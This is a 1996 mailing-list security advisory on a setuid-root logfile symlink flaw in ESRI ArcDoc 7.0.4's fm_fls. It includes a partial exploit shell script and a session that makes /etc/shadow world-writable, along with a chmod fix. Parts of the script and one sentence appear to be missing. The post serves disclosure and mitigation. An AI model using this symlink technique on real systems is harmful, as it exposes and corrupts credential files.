mailing list archives
Security problem in ESRI's ArcDoc 7.0.4
From: jwa () nbs nau edu (James W. Abendschan)
Date: Thu, 23 May 1996 21:21:46 -0700
*** GIS & ESRI/ARC/Info shops take note! ***
The program "fm_fls" as distributed with ESRI's "ArcDoc" package (7.0.4)
contains a bug which allows us to (a) add somewhat arbitrary data
to any file and (b) changes the permissions of that file to rw-rw-rw-.
fm_fls is setuid root.
When fm_fls is executed, it opens up a logfile -- the default location
for this file is /tmp/fm_fls.log. Unfortunately, it doesn't
check if this file already exists or if this file has any symlinks
attached to it. If for some reason fm_fls gets bad arguments, it
will write these bad arguments to the logfile, chown the file to
root, give the file 666 permissions, and exit.
If we make a link from this file to an unreadable file, we
can both append the contents of the logfile into the unreadable
file and gain world rw access to the file.
ecosys:~jwa/Security/Projects/r00tin> ls -l /etc/shadow
-rw------- 1 root other 1851 May 23 20:22 /etc/shadow
ecosys:~jwa/Security/Projects/r00tin> fm.sploit /etc/shadow
/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License File woot
fm.sploit of /etc/shadow yields:
-rw-rw-rw- 1 root other 2011 May 23 20:38 /etc/shadow
ecosys:~jwa/Security/Projects/r00tin> tail -5 /etc/shadow
1996/05/23-20:38:32 BG woot ecosys
# 1996/05/23-20:38:32 /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error. Unable to open License
Note the additional lines appended to the target file (in this case,
To fix this, either (a) yell at your vendor or (b) chmod 555 `which fm_fls`.
I don't yet know the effects of removing the suid bit on fm_fls; I'd
like to hear feedback on this. I've seen fm_fls distributed with
other applications -- perhaps the bug is not specific to ARC/Info?
Comments are welcome.
# exploit a bug in the fm_fls application as distributed with ARC/Info's
# ArcDoc (and others?) to give us rw access to any file.
# fix: chmod 555 `which fm_fls`
# tested on Solaris 2.5 w/ ArcDoc 7.0.4
# James Abendschan jwa () nbs nau edu 23 May 1996
# full path to the fm_fls executable
if [ $# != 1 ]
echo "usage: `basename $0` filename"
rm -f $LOGFILE
if [ -f $LOGFILE ]
echo "tried to remove $LOGFILE, but it still exists! Exploit won't work."
# since fm_fls will complain if we link to a logfile too "far away"
# from the original file, we just do a dual link..
ln -s $UNREADABLE $TMP
ln -s $TMP $LOGFILE
echo "`basename $0` of $UNREADABLE yields:"
ls -l $UNREADABLE
# all done, clean up.
rm -f $TMP $LOGFILE
James W. Abendschan Email: jwa () nbs nau edu
UNIX Systems Programmer/Administrator Phone: (520) 556-7466 x238
Colorado Plateau Research Station, Flagstaff, AZ Voice mail: *516
- Security problem in ESRI's ArcDoc 7.0.4 James W. Abendschan (May 24)